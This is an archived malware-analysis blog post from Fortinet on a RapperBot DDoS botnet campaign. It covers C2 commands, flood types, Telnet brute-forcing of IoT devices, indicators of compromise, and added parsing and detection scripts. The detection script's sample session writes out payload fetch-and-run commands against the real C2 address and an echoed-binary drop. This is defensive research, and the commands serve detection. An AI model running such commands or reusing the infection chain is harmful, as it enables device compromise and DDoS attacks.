https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks
Submission: On November 16 via api from DE — Scanned from DE
NEW RAPPERBOT CAMPAIGN – WE KNOW WHAT YOU BRUTING FOR THIS TIME

Threat Research | By Joie Salvio and Roy Tay | November 15, 2022

After FortiGuard Labs reported on RapperBot in our previous article titled So RapperBot, What Ya Bruting For? in August 2022, there was a significant drop in the number of samples collected in the wild. But in early October 2022, new samples with the same distinctive C2 protocol used by RapperBot were detected. Unlike the murky objectives of the previous campaign, it is quickly evident that these samples are part of a separate campaign to launch Distributed Denial of Service (DDoS) attacks against game servers, which we believe to be a re-emergence of a similar campaign from earlier this year.

Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical

This article discusses the differences observed in this campaign and its relation to the previous RapperBot and similar campaigns in the past.

RAPPERBOT REBOOTED

FortiGuard Labs encountered this campaign by hunting for samples using the unique bot ID used by RapperBot to communicate with its Command-and-Control (C2) server, as reported in the previous article. But once we analyzed these new samples, we observed a significant difference between them and the earlier campaign. In fact, it turns out that this campaign is less like RapperBot than an older campaign that appeared in February and then mysteriously disappeared in the middle of April. Other related campaigns uncovered during this investigation are detailed later in this article.
NETWORK PROTOCOL AND DENIAL-OF-SERVICE (DOS) ATTACKS

The C2 network protocol used in previous campaigns remains essentially unchanged, with additional commands added to support the Telnet brute force. The list of commands and IDs is shown below:

* 0x00: Register (used by the client)
* 0x01: Keep-Alive/Do nothing
* 0x02: Stop all DoS attacks and terminate the client
* 0x03: Perform a DoS attack
* 0x04: Stop all DoS attacks
* 0x06: Restart Telnet brute forcing
* 0x07: Stop Telnet brute forcing

The previously reported RapperBot campaign was limited to a few generic DoS methods against TCP and UDP services. This campaign adds DoS attacks against the GRE protocol (likely reusing the Mirai source code) and the UDP protocol used by the Grand Theft Auto: San Andreas Multi Player (SA:MP) mod. Here are the DoS attack commands supported by this botnet:

* 0x00: Generic UDP flood
* 0x01: TCP SYN flood
* 0x02: TCP ACK flood
* 0x03: TCP STOMP flood
* 0x04: UDP SA:MP flood targeting game servers running GTA San Andreas: Multi Player (SA:MP)
* 0x05: GRE Ethernet flood
* 0x06: GRE IP flood
* 0x07: Generic TCP flood

These specific commands, coupled with the absence of HTTP-related DDoS attacks, suggest that this campaign is primarily geared toward game server DDoS.

TELNET SELF-PROPAGATION

The most significant difference in the new campaign was the complete replacement of the SSH brute forcing code with the more usual Telnet equivalent. FortiGuard Labs has observed similar drastic modifications within RapperBot samples, as detailed in our previous report, adding and removing even DoS attack code on an apparent whim.

The Telnet brute forcing code is designed primarily for self-propagation and resembles the old Mirai Satori botnet. Unlike the earlier SSH brute-forcing campaign, the plaintext credentials are embedded into the malware instead of being downloaded from the C2.

Figure 1. Function initializing the credential list

The credentials used appear to be default credentials for IoT devices. To optimize brute forcing efforts, the malware compares the server prompt upon connection to a hardcoded list of strings to identify the possible device and then only tries the known credentials for that device. Unlike less sophisticated IoT malware, this allows the malware to avoid testing a full list of credentials. While not exactly a novel technique, it is still uncommon compared to other IoT botnets.

Based on the prompt messages hardcoded into the malware, most of the targeted devices are IoT devices such as routers and DVRs. This campaign seems especially interested in older devices with the Qualcomm MDM9625 chipset, such as LTE modems. It attempts to specifically gain root access to these devices via a default password, despite having the same credentials in the list embedded in the binary.

Figure 2. Gaining root access on devices with a default password

Like the earlier SSH brute-forcing campaign, once it has successfully gained access, it sends the credentials used, the compromised device's IP address, and its architecture to the C2 server on a separate port, 5123.

After reporting, the malware attempts to install its main payload binary on the compromised device. It first parses the Executable and Linkable Format (ELF) header of the /bin/busybox file for the e_machine field, which provides the architecture of the compromised device. This allows it to download and deploy a RapperBot payload of the correct architecture to ensure proper execution. This selective behavior is more efficient than the shotgun approach in most IoT malware families, whereby all the binaries for the supported architectures are downloaded and executed in the victim's system. Based on the payload binaries we collected, this botnet currently seems to only target devices running on ARM, MIPS, PowerPC, SH4, and SPARC architectures.
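The e_machine lookup described above is the same parse an analyst performs in the other direction: given a collected payload (the armv4l, mips, powerpc, sh4 or sparc builds from the IOC list), read the ELF header to decide which emulator or disassembler to load. The following is an added example written for this article, not code from Fortinet or from the malware; the header bytes it feeds itself are constructed test inputs, and the e_machine table is the subset of ELF specification values relevant to the architectures named in the post.

```python
"""Identify the CPU architecture of an ELF binary from its header.

Added example (not Fortinet's or RapperBot's code). The post describes the
bot reading e_machine from /bin/busybox to pick a payload build; the same
parse lets an analyst sort collected payloads by architecture. Header bytes
produced by make_header() are constructed test inputs, not real samples.
"""
import struct

ELF_MAGIC = b"\x7fELF"

# e_machine values from the ELF specification (subset relevant to the post).
E_MACHINE = {
    2: "SPARC",
    3: "x86",
    8: "MIPS",
    20: "PowerPC",
    21: "PowerPC64",
    40: "ARM",
    42: "SH",
    62: "x86-64",
    183: "AArch64",
}


def parse_elf_header(data: bytes) -> dict:
    """Return class, byte order and machine name from an ELF header.

    Raises ValueError for non-ELF input or an unknown class/encoding so a
    caller never silently treats junk as a valid header.
    """
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    bits = {1: 32, 2: 64}.get(ei_class)
    order = {1: "<", 2: ">"}.get(ei_data)  # struct prefix: little / big endian
    if bits is None or order is None:
        raise ValueError("unknown ELF class or data encoding")
    # e_type and e_machine are the two 16-bit fields right after e_ident;
    # their byte order follows EI_DATA, so a MIPS big-endian header is read
    # differently from an ARM little-endian one.
    e_type, e_machine = struct.unpack(order + "HH", data[16:20])
    return {
        "bits": bits,
        "endian": "little" if ei_data == 1 else "big",
        "e_type": e_type,
        "e_machine": e_machine,
        "machine": E_MACHINE.get(e_machine, f"unknown(0x{e_machine:x})"),
    }


def is_intel(data: bytes) -> bool:
    """True for x86 / x86-64 binaries (the post says the bot skips such hosts)."""
    return parse_elf_header(data)["machine"] in ("x86", "x86-64")


def make_header(bits: int, endian: str, e_machine: int, e_type: int = 2) -> bytes:
    """Build a minimal 20-byte ELF header for testing (constructed input)."""
    ei_class = 1 if bits == 32 else 2
    ei_data = 1 if endian == "little" else 2
    order = "<" if endian == "little" else ">"
    e_ident = ELF_MAGIC + bytes([ei_class, ei_data, 1]) + b"\x00" * 9
    return e_ident + struct.pack(order + "HH", e_type, e_machine)


if __name__ == "__main__":
    for label, hdr in [
        ("mips (big endian)", make_header(32, "big", 8)),
        ("armv7l", make_header(32, "little", 40)),
        ("x86_64 host", make_header(64, "little", 62)),
    ]:
        print(label, parse_elf_header(hdr))
```

On a real file, pass the first 20 bytes (`open(path, "rb").read(20)`) to `parse_elf_header`; the endianness branch matters because the same e_machine value is stored as different bytes on big-endian MIPS and little-endian ARM.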
Moreover, it specifically checks and stops its self-propagation if the device is detected to be running on Intel processors. The bot then downloads its payload via software installed on the compromised device, such as ftpget, wget, curl, or tftp, before executing the payload.

Figure 3. Downloading the payload binary using the wget tool

If none of the software mentioned above is installed, it will extract and send an embedded binary downloader to the compromised device that executes and downloads the primary payload. Unlike in Satori, these embedded downloaders are stored as escaped byte strings, probably to simplify parsing and processing within the code.

Figure 4. List of embedded binary downloaders

The binary downloaders are written by echoing the bytes and piping the content to a file in the victim system. As labeled in Figure 4, each binary has a hardcoded URL for downloading the payload binary of the proper architecture.

Figure 5. Writing downloader binary and executing it

No attempts to persist on infected or brute-forced devices were observed for this campaign.

RELATED CAMPAIGNS

FortiGuard Labs compared samples for this and related campaigns from the past to find any links with the previously reported RapperBot campaign. We observed that the earliest samples for this campaign were from December 2021 and that the SA:MP attack was only added in February 2022. This campaign mysteriously disappeared in mid-April 2022, resurfacing in October 2022 with the addition of the self-propagation feature.

We also found older samples from another campaign that was active in August-September 2021 with an almost identical list of credentials. These samples contain slightly fewer credentials and a simpler self-propagation code that only supports downloading the payload via wget or the binary downloader embedded directly into the sample.
This campaign did not support stopping or restarting the Telnet propagation, and while the samples support the same commands, their associated IDs did not match.

Figure 6. Timeline of related campaigns

The similar lists of credentials suggest that the threat actor behind this current campaign has access to the source code for the earlier campaign, as this code was not found in other IoT malware samples.

CONNECTIONS TO RAPPERBOT

The fact that samples from both campaigns use the same C2 protocol, coupled with the absence of this campaign during the RapperBot campaign active between June and August 2022 and its recent reappearance, seems to be more than a coincidence. With the several similarities between the two campaigns outlined below, we believe that either the same threat actor might be behind both campaigns or each campaign might have branched from the same privately-shared source code.

1. The C2 commands and corresponding IDs are identical in both campaigns (excluding the Telnet-related commands, as those do not apply to RapperBot).
2. Both campaigns show a certain degree of effort in optimizing the brute forcing implementation. Code for the brute forcing implementation is significantly more structured than typical IoT malware that copies and pastes code with minimal modifications.
3. RapperBot also supported the TCP STOMP attack popularized by Mirai. This attack was not observed in the earlier campaigns mentioned above. However, as both Mirai and Satori source code are publicly available, this is considered a very weak link between the campaigns.

If both campaigns were related, the reason for restarting an older campaign remains a mystery.

CONCLUSION

Based on the undeniable similarities between this new campaign and the previously reported RapperBot campaign, it is highly likely that they are being operated by a single threat actor or by different threat actors with access to a privately-shared base source code.
Unlike the previous RapperBot campaign, this new campaign has a clear motivation to compromise as many IoT devices as possible to build a DDoS botnet. Although this new campaign has evolved significantly from previous campaigns, mitigating it remains the same: setting strong passwords for all devices connected to the internet. FortiGuard Labs will continue to monitor RapperBot's development.

FORTINET PROTECTIONS

The FortiGuard Antivirus service detects and blocks this threat as ELF/Mirai, Linux/Mirai, and ELF/Gafgyt. The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR, and the Fortinet AntiVirus engine is a part of each of those solutions. Customers running current AntiVirus updates are protected.

FortiGuard Labs provides the Rapper.Botnet IPS signature against RapperBot C2 activity.

The FortiGuard Web Filtering Service blocks the C2 servers and download URLs.

FortiGuard IP Reputation and Anti-Botnet Security Service proactively block these attacks by aggregating malicious source IP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global sources that collaborate to provide up-to-date threat intelligence about hostile sources.
IOCS

FILES

3d5c5d9e792e0a5f3648438b7510b284f924ab433f08d558b6e082e1d5414a03
7afcac5f71e9205879e0e476d3388898a62e7aa4a3e4a059884f40ea36cfd57f
8ec79a35700f6691f0d88d53647e9f2b75648710ecd119e55815331fc3bdd0b5
a12ad4bc394d60bc037271e1c2df1bd2b87bdaaba85f6c1b7d046341f027cc2d
f000bf482040b48595badee1fc56afb95449ac48b5dc35fe3a05542cbf18f658
4aa9175c1846557107ec197ea73d4cc8dbe6d575a8fd86ae214ff9b3a00e438b
f98261eb7dc122449c158118cc9c660683206983a9e90ff73eb88c4705e0c48e

DOWNLOAD URLS

hxxp://185[.]216[.]71[.]149/armv4l
hxxp://185[.]216[.]71[.]149/armv5l
hxxp://185[.]216[.]71[.]149/armv6l
hxxp://185[.]216[.]71[.]149/armv7l
hxxp://185[.]216[.]71[.]149/mips
hxxp://185[.]216[.]71[.]149/mipsel
hxxp://185[.]216[.]71[.]149/powerpc
hxxp://185[.]216[.]71[.]149/sparc
hxxp://185[.]216[.]71[.]149/sh4
hxxp://185[.]216[.]71[.]149/bot_arm4_el
hxxp://185[.]216[.]71[.]149/bot_arm5_el
hxxp://185[.]216[.]71[.]149/bot_arm6_el
hxxp://185[.]216[.]71[.]149/bot_arm7_el
hxxp://185[.]216[.]71[.]149/bot_mips_eb
hxxp://185[.]216[.]71[.]149/bot_mips_el
hxxp://185[.]216[.]71[.]149/bot_sh_el

C2

185[.]216[.]71[.]149
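The IOCs above, together with the payload-delivery steps described earlier (fetching the payload with ftpget, wget, curl or tftp, or writing an embedded downloader by echoing escaped bytes into a file and running it), translate directly into host-side detection logic. The following is an added example written for this article, not Fortinet's or the malware's code. It assumes command-line telemetry where each captured shell command is one line (a Telnet honeypot session log or an EDR process-command feed); the download host and payload file names are taken from the IOC list and refanged once inside the code, and the session lines it scans are constructed.

```python
"""Flag shell commands that match the post's payload-delivery steps.

Added example, not Fortinet code. Two rules:
  ioc_download       a download tool named in the post (ftpget/wget/curl/tftp)
                     used with the listed download host or a listed payload name
  echo_binary_write  `echo -e/-ne '\\x..'` escapes redirected into a file,
                     the embedded-downloader drop described in the post
Input format (one shell command per line) is an assumption; SESSION below
is constructed sample telemetry, not captured data.
"""
import re

# IOC host as published (defanged); refanged once so it matches real telemetry.
C2_HOST = "185[.]216[.]71[.]149".replace("[.]", ".")
# Payload file names from the post's download URL list.
PAYLOAD_NAMES = {
    "armv4l", "armv5l", "armv6l", "armv7l", "mips", "mipsel", "powerpc",
    "sparc", "sh4", "bot_arm4_el", "bot_arm5_el", "bot_arm6_el",
    "bot_arm7_el", "bot_mips_eb", "bot_mips_el", "bot_sh_el",
}

TOOL_RE = re.compile(r"\b(ftpget|wget|curl|tftp)\b")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# echo with an -e style flag, a quoted run of \xNN escapes, redirected to a path.
ECHO_BYTES_RE = re.compile(
    r"\becho\s+-[a-zA-Z]*e[a-zA-Z]*\s+(['\"]?)((?:\\x[0-9a-fA-F]{2})+)\1[^>|]*>\s*([^\s;&|]+)"
)


def scan_session(lines):
    """Return a list of finding dicts, one per matching line."""
    findings = []
    for i, line in enumerate(lines):
        m = TOOL_RE.search(line)
        if m:
            hosts = set(IPV4_RE.findall(line))
            names = set(re.findall(r"[\w.]+", line)) & PAYLOAD_NAMES
            # Host match is high confidence; a bare payload name alone is
            # weaker evidence (assumption: names like "mips" can occur benignly).
            if C2_HOST in hosts or names:
                findings.append({
                    "line": i, "rule": "ioc_download", "tool": m.group(1),
                    "hosts": sorted(hosts), "names": sorted(names),
                    "severity": "high" if C2_HOST in hosts else "medium",
                })
        m = ECHO_BYTES_RE.search(line)
        if m:
            raw = bytes.fromhex(m.group(2).replace("\\x", ""))
            elf = raw.startswith(b"\x7fELF")  # escapes that spell an ELF header
            findings.append({
                "line": i, "rule": "echo_binary_write", "path": m.group(3),
                "bytes": len(raw), "elf_magic": elf,
                "severity": "high" if elf else "medium",
            })
    return findings


# Constructed sample session; benign lines are included to show what is skipped.
SESSION = [
    "uname -m; cat /proc/cpuinfo | head -n 5",
    "ls -la /tmp",
    f"wget http://{C2_HOST}/mips -O /tmp/.x; chmod +x /tmp/.x; /tmp/.x",
    f"tftp -g -r armv7l {C2_HOST}",
    r"echo -ne '\x7f\x45\x4c\x46\x01\x01\x01' > /tmp/dl; chmod 777 /tmp/dl; /tmp/dl",
    "echo hello > /tmp/note.txt",
    "curl -sS https://example.com/update.tar.gz -o /tmp/update.tar.gz",
]

if __name__ == "__main__":
    for f in scan_session(SESSION):
        print(f)
```

The echo rule keys on the escape run rather than on any particular byte string, so it also catches downloaders with different contents; checking whether the decoded bytes begin with the ELF magic is what lifts a hit to high severity. A plain `echo hello > file` and a download from an unlisted host produce no finding, which keeps the rule usable on noisy shell telemetry.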
Tags: fortiguard labs, fortiguard antivirus, RapperBot, DDoS attacks